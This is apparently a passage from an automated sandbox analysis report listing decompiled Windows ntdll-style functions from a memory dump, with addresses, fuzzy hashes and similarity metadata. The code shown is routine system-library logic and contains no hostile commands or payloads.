                                                                                                                          • Opcode Fuzzy Hash: 7992a603b20944b3ee807ad58242e79523889c08d04db2d249a3de31b1138e7f
                                                                                                                          • Instruction Fuzzy Hash: D7316CB5508305DFC311DF28E98196BBBE8EB95754F100A2EF99497211D734DD08DB93
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A11B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E00A11B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E00A4BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E00A4A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E00A4A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L00A24620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                                                          0x00a11b8f
                                                                                                                          0x00a11b9a
                                                                                                                          0x00a11b9c
                                                                                                                          0x00a11b9e
                                                                                                                          0x00a11ba3
                                                                                                                          0x00a67010
                                                                                                                          0x00a67010
                                                                                                                          0x00000000
                                                                                                                          0x00a11ba9
                                                                                                                          0x00a11ba9
                                                                                                                          0x00a11bae
                                                                                                                          0x00000000
                                                                                                                          0x00a11bc5
                                                                                                                          0x00a11bca
                                                                                                                          0x00a11bcf
                                                                                                                          0x00a11bd0
                                                                                                                          0x00a11bd1
                                                                                                                          0x00a11bd2
                                                                                                                          0x00a11bd6
                                                                                                                          0x00a11bdc
                                                                                                                          0x00a11be0
                                                                                                                          0x00a66ffc
                                                                                                                          0x00a67000
                                                                                                                          0x00000000
                                                                                                                          0x00a67006
                                                                                                                          0x00a67009
                                                                                                                          0x00a67009
                                                                                                                          0x00a11be6
                                                                                                                          0x00a11bec
                                                                                                                          0x00a11c0b
                                                                                                                          0x00a11c0b
                                                                                                                          0x00a11c0c
                                                                                                                          0x00a11c11
                                                                                                                          0x00a11c12
                                                                                                                          0x00a11c15
                                                                                                                          0x00a11c1b
                                                                                                                          0x00a11c1f
                                                                                                                          0x00a11c31
                                                                                                                          0x00a11c33
                                                                                                                          0x00a67026
                                                                                                                          0x00a67026
                                                                                                                          0x00a11c21
                                                                                                                          0x00a11c24
                                                                                                                          0x00a11c24
                                                                                                                          0x00a11bee
                                                                                                                          0x00a11bee
                                                                                                                          0x00a11bf2
                                                                                                                          0x00a11c3a
                                                                                                                          0x00a11bf4
                                                                                                                          0x00a11bf4
                                                                                                                          0x00a11c05
                                                                                                                          0x00a11c05
                                                                                                                          0x00a11c09
                                                                                                                          0x00a11c3e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a11c09
                                                                                                                          0x00a11bec
                                                                                                                          0x00a11be0
                                                                                                                          0x00a11bae
                                                                                                                          0x00a11c2e

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: WindowsExcludedProcs
                                                                                                                          • API String ID: 0-3583428290
                                                                                                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                          • Instruction ID: eafe747f21a0e88effc76740b385229805db3821669829b1e04b8abbb7431d3b
                                                                                                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                          • Instruction Fuzzy Hash: 5621F23B954228ABDB219B99C940FAFB7BDEF81B50F164425FA048B200D634DD0097F0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A2F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00A2F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                                                          0x00a2f71d
                                                                                                                          0x00a2f722
                                                                                                                          0x00a2f726
                                                                                                                          0x00a74770
                                                                                                                          0x00a2f765
                                                                                                                          0x00a2f769
                                                                                                                          0x00a2f769
                                                                                                                          0x00a2f732
                                                                                                                          0x00a7477a
                                                                                                                          0x00000000
                                                                                                                          0x00a7477a
                                                                                                                          0x00a2f738
                                                                                                                          0x00a2f73a
                                                                                                                          0x00a2f73c
                                                                                                                          0x00a2f73f
                                                                                                                          0x00a2f746
                                                                                                                          0x00a2f778
                                                                                                                          0x00a2f7a9
                                                                                                                          0x00a2f7a9
                                                                                                                          0x00a2f754
                                                                                                                          0x00a2f75a
                                                                                                                          0x00a2f75d
                                                                                                                          0x00a2f75f
                                                                                                                          0x00a2f761
                                                                                                                          0x00a2f76f
                                                                                                                          0x00a2f771
                                                                                                                          0x00a2f771
                                                                                                                          0x00a2f76f
                                                                                                                          0x00a2f763
                                                                                                                          0x00000000
                                                                                                                          0x00a2f763
                                                                                                                          0x00a2f77d
                                                                                                                          0x00a2f7a3
                                                                                                                          0x00a2f7a5
                                                                                                                          0x00000000
                                                                                                                          0x00a2f7a5
                                                                                                                          0x00a2f77f
                                                                                                                          0x00a2f782
                                                                                                                          0x00a2f784
                                                                                                                          0x00a2f786
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a2f788
                                                                                                                          0x00a2f748
                                                                                                                          0x00a2f74d
                                                                                                                          0x00a2f78d
                                                                                                                          0x00a2f793
                                                                                                                          0x00a2f7b7
                                                                                                                          0x00a2f7bc
                                                                                                                          0x00000000
                                                                                                                          0x00a2f7bc
                                                                                                                          0x00a2f798
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a2f79d
                                                                                                                          0x00a2f7b0
                                                                                                                          0x00000000
                                                                                                                          0x00a2f7b0
                                                                                                                          0x00a2f79f
                                                                                                                          0x00000000
                                                                                                                          0x00a2f74f
                                                                                                                          0x00a2f74f
                                                                                                                          0x00000000
                                                                                                                          0x00a2f74f

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Actx
                                                                                                                          • API String ID: 0-89312691
                                                                                                                          • Opcode ID: 0ed84112725c422788bda5f723310a3b3f9aea90e199a689a88d167954a5dcaa
                                                                                                                          • Instruction ID: 7cbaaab5de727dffe7abc6182770ff420975ac9dcd94fe35ef02a496878aae76
                                                                                                                          • Opcode Fuzzy Hash: 0ed84112725c422788bda5f723310a3b3f9aea90e199a689a88d167954a5dcaa
                                                                                                                          • Instruction Fuzzy Hash: 7311BF357047228FEB284F1DE99073672B6EB96724F35453AE866CB391DB70CC409340
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00AB8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          • Critical error detected %lx, xrefs: 00AB8E21
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Critical error detected %lx
                                                                                                                          • API String ID: 0-802127002
                                                                                                                          • Opcode ID: a0cd5832f99f6fa63bfa45e6fd35725a39ab575f83a84ce5c050f5b2f7fd9f40
                                                                                                                          • Instruction ID: a9b704fa2fbebae74d9ca98aec5af3371c69635c4843368f70acf807a5bef865
                                                                                                                          • Opcode Fuzzy Hash: a0cd5832f99f6fa63bfa45e6fd35725a39ab575f83a84ce5c050f5b2f7fd9f40
                                                                                                                          • Instruction Fuzzy Hash: 96115B71D15348DBDF25DFA885067DCBBB8BB04715F24425DE929AB282C7748605CF14
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A9FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00A9FF60
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                          • API String ID: 0-1911121157
                                                                                                                          • Opcode ID: 51878286d4a3f3a252800e2c1009c299610e378307fa0d810aeb6f678b64b4b3
                                                                                                                          • Instruction ID: fc7086bd41009b557a93e3bf8dac7c5ce8b31ded215f6f53703a32623b2528cf
                                                                                                                          • Opcode Fuzzy Hash: 51878286d4a3f3a252800e2c1009c299610e378307fa0d810aeb6f678b64b4b3
                                                                                                                          • Instruction Fuzzy Hash: F511A171A10544EFDF22DB90C949FA8B7F1FB04705F148454F509AB1A2C7799984CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00AD5BA5, Relevance: .6, Instructions: 592COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0c29a8923b8bf8a6bda16e86c6f876418f7c9c6231dcf0365da4b45a65b69628
                                                                                                                          • Instruction ID: 7bd852a4b28ed16e8ac3828ec7652a39066f8c24b5fec5c2e91e5222c503c592
                                                                                                                          • Opcode Fuzzy Hash: 0c29a8923b8bf8a6bda16e86c6f876418f7c9c6231dcf0365da4b45a65b69628
                                                                                                                          • Instruction Fuzzy Hash: 91424875E00629CFDB24CF68C981BA9B7B1FF49304F1481AAD95EAB342D7349A85CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A24120, Relevance: .4, Instructions: 444COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cb8289c776d995180a0f512bf39e43e3ec17855d03e0ede6b79f42bc273d8ab1
                                                                                                                          • Instruction ID: 7417584e1270b4a9b2479d5c31ff6bcacbdf0ee580f75e88d2cf65029cc8730e
                                                                                                                          • Opcode Fuzzy Hash: cb8289c776d995180a0f512bf39e43e3ec17855d03e0ede6b79f42bc273d8ab1
                                                                                                                          • Instruction Fuzzy Hash: D5F17B746082218BC728DF69D480A7AB7F2FF99704F15492EF886CB290E734DD91DB52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A320A0, Relevance: .4, Instructions: 420COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 631c5f9067703bdf00d554eaa52d1f87d4c2a05bf5ca4307a04dcab8cc0fbdf3
                                                                                                                          • Instruction ID: e17b6cd446578c3e0ad48137a7b0955729430679b0f35d0f920b78d3bc85b711
                                                                                                                          • Opcode Fuzzy Hash: 631c5f9067703bdf00d554eaa52d1f87d4c2a05bf5ca4307a04dcab8cc0fbdf3
                                                                                                                          • Instruction Fuzzy Hash: AEF1F031A087419FDB25CF68C94076BB7E1AF95324F18CA2DF9998B290D774DC41CB82
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A1D5E0, Relevance: .4, Instructions: 353COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5219e7941bce86f68cdd4b21fe8729e0fab6f3b5f85d370a7ec86cc8860528cf
                                                                                                                          • Instruction ID: 3942849ad4d60b178b025c75b21d101f66ebb241a45001d8e80addfdca15f9fb
                                                                                                                          • Opcode Fuzzy Hash: 5219e7941bce86f68cdd4b21fe8729e0fab6f3b5f85d370a7ec86cc8860528cf
                                                                                                                          • Instruction Fuzzy Hash: A7E1AE34A103599FDB24DF68C984BF9B7B2BF45304F1401A9E919AB291DB34ADC1CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A1849B, Relevance: .3, Instructions: 290COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e77c97d550b32a729ddcafc92866277cb97af6cbf880fff1d397335f2d8f295f
                                                                                                                          • Instruction ID: b3b3d6ef09e8e20904fed2cee2e4e4d1f2db43b84a5a074c8bc7d0cf8599a9f8
                                                                                                                          • Opcode Fuzzy Hash: e77c97d550b32a729ddcafc92866277cb97af6cbf880fff1d397335f2d8f295f
                                                                                                                          • Instruction Fuzzy Hash: D2B16B70E04219DFDB14DFE8D984AEEBBB9FF49304F20412AE416AB245DB74AD85CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A3513A, Relevance: .3, Instructions: 258COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b28f2b768e3b4f7748f3d1835e93491405ffec28f40123804ce6f48e1d3aba75
                                                                                                                          • Instruction ID: 951908da8895f4c9ff156485982fac4e0f6618fefcf71165fd5a764493ce48e6
                                                                                                                          • Opcode Fuzzy Hash: b28f2b768e3b4f7748f3d1835e93491405ffec28f40123804ce6f48e1d3aba75
                                                                                                                          • Instruction Fuzzy Hash: 61C1F1756097818FD354CF28C980A5AFBF1BF88304F188A6EF8998B352D771E945CB52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A303E2, Relevance: .3, Instructions: 254COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a0e7129a03e5f6bc81a69beafd1c61ad231abf2de7ba6ed68c716cb1e9a3a78a
                                                                                                                          • Instruction ID: fb46368e88c258cfdf2de5114e7cc5b0e0549205c1564231884306150eee139d
                                                                                                                          • Opcode Fuzzy Hash: a0e7129a03e5f6bc81a69beafd1c61ad231abf2de7ba6ed68c716cb1e9a3a78a
                                                                                                                          • Instruction Fuzzy Hash: 86914631E04214AFEB31DBA8CC59FBE7BB4AB05720F158261FA54AB2D2D7749D40CB81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A0C600, Relevance: .2, Instructions: 225COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e6a3ab470cd242aa4d1fa82724f6ce1c28966baf7f4f237fe9a28df5c41b9f1b
                                                                                                                          • Instruction ID: ff871d6ae40d27fa3a1f8b419ec1069b1dd0cba761cb8a5c64c3ea489b3a888c
                                                                                                                          • Opcode Fuzzy Hash: e6a3ab470cd242aa4d1fa82724f6ce1c28966baf7f4f237fe9a28df5c41b9f1b
                                                                                                                          • Instruction Fuzzy Hash: 6C8161766482019FDB25CF14CC81A7FB3A5EB84394F25C96AFD4A9B241E330DD45CBA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A9B8D0, Relevance: .2, Instructions: 199COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 80e2b46fbf4ad525aa98551aa06a58071da9b9d07e70811469e13a8438d7e845
                                                                                                                          • Instruction ID: 4493c63676564d537db9157167324ff9abc5f7318afa98b9bf7bde837ec6fb8c
                                                                                                                          • Opcode Fuzzy Hash: 80e2b46fbf4ad525aa98551aa06a58071da9b9d07e70811469e13a8438d7e845
                                                                                                                          • Instruction Fuzzy Hash: 16710F32320701AFDB21CF28DA45F6AB7F5EB84760F208528E6558B6E1DB74E940CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A86DC9, Relevance: .2, Instructions: 199COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                          • Instruction ID: 353330b1b04f3c0453acc58f2d05970abeae14c566527bda7418fa028dcffa62
                                                                                                                          • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                          • Instruction Fuzzy Hash: 9A716971E00219AFDB10EFA9DA85AEEBBB9FF48714F104069E505E7251DB34EE41CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A052A5, Relevance: .2, Instructions: 161COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8648272a5bf8b216c57e12bb46bbd9cb570ae4bf90c0f59815d6398798c0c270
                                                                                                                          • Instruction ID: fecd97d672735ee24ee5323628b6fc01e390f087183e994d6752658e0f26063b
                                                                                                                          • Opcode Fuzzy Hash: 8648272a5bf8b216c57e12bb46bbd9cb570ae4bf90c0f59815d6398798c0c270
                                                                                                                          • Instruction Fuzzy Hash: 4751F130208746AFD321DF68C941B6BBBE4FF54710F10491EF49587692E770E884CB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A32AE4, Relevance: .2, Instructions: 159COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 40b20c8a022400b00d822d47ee67cd72c7b7ec2e1036918e29779f10ad721879
                                                                                                                          • Instruction ID: 142340348e18074dd6a7ecdaa40659c4e7b9af6048845078dd0145a9affbcc72
                                                                                                                          • Opcode Fuzzy Hash: 40b20c8a022400b00d822d47ee67cd72c7b7ec2e1036918e29779f10ad721879
                                                                                                                          • Instruction Fuzzy Hash: 9C519D76B00125CFCB18DF5DC890ABDB7B1FB88700B15845AF856AB324E734AE51DB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00ACAE44, Relevance: .2, Instructions: 152COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e8a8ecff9d26bc1ba5973b6e0481caed76287c4954cc9fbbca4006ddb68d2c8d
                                                                                                                          • Instruction ID: 09856ebea233bea68c6b1be4b18b848fe42ecc8e149620f1feaa54de122aa312
                                                                                                                          • Opcode Fuzzy Hash: e8a8ecff9d26bc1ba5973b6e0481caed76287c4954cc9fbbca4006ddb68d2c8d
                                                                                                                          • Instruction Fuzzy Hash: D84108717002199BC725DB29C884F3BB399EFA4728F06821DF8168B291DB74DC01C7E2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A2DBE9, Relevance: .1, Instructions: 149COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1d2ed7c2bddb7e65effae229568babd782dc14d9aff887d9b838fca752c54324
                                                                                                                          • Instruction ID: 95cb2b79924b1e7325d942dbc643cf96b2b2d2c878b335dbeb63f99a8e8e9e54
                                                                                                                          • Opcode Fuzzy Hash: 1d2ed7c2bddb7e65effae229568babd782dc14d9aff887d9b838fca752c54324
                                                                                                                          • Instruction Fuzzy Hash: 02518D71A01625DFCB14CFACD980AAEFBF1BB48310F21856AD559E7342DB71AD44CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A1EF40, Relevance: .1, Instructions: 147COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                          • Instruction ID: bc2bc14746bd888dc967a0eca598e3d58d5eff235daee7a8eaf6e21e950371fd
                                                                                                                          • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                          • Instruction Fuzzy Hash: B251F230A04289DFDB24CB68C1D0BEEBBB1AF19314F2881B8DC4597282D375ADCAD751
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00AD740D, Relevance: .1, Instructions: 141COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                          • Instruction ID: 41ce7742e1a1ef4b694f83453be43d03e0a1891284d45956cea9e57401c7b651
                                                                                                                          • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                          • Instruction Fuzzy Hash: 3D518B71600606EFCB1ACF14D581A9ABBB5FF45304F14C0BAE9099F352E372E946CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A32990, Relevance: .1, Instructions: 133COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d1eb4f99262e123b6a3513259695afa8a207261c62ed66e647cefc05928a99e9
                                                                                                                          • Instruction ID: 58e4d3b1844730fbd1435e175e90c87dc58e40d17fc0e86b10bfb480cc18e44c
                                                                                                                          • Opcode Fuzzy Hash: d1eb4f99262e123b6a3513259695afa8a207261c62ed66e647cefc05928a99e9
                                                                                                                          • Instruction Fuzzy Hash: 38514171E00219EFDF25DF95C980AEEBBB5BF48350F148015F815AB261C3319D92DBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A34BAD, Relevance: .1, Instructions: 131COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: af40223ef336c2cd3c73d198e260a6596ddeb575e1a0590b9091bc2d8e5c2e2f
                                                                                                                          • Instruction ID: 24e6f36bc880a11ff4db94e6fe545a32c7afc7b648469bddfa013da1c72b7dab
                                                                                                                          • Opcode Fuzzy Hash: af40223ef336c2cd3c73d198e260a6596ddeb575e1a0590b9091bc2d8e5c2e2f
                                                                                                                          • Instruction Fuzzy Hash: 5E418F35A016289BCB21DF68CE41BEAB7B4AF49750F0140A5F908AB241DB74EE85CB95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A34D3B, Relevance: .1, Instructions: 131COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
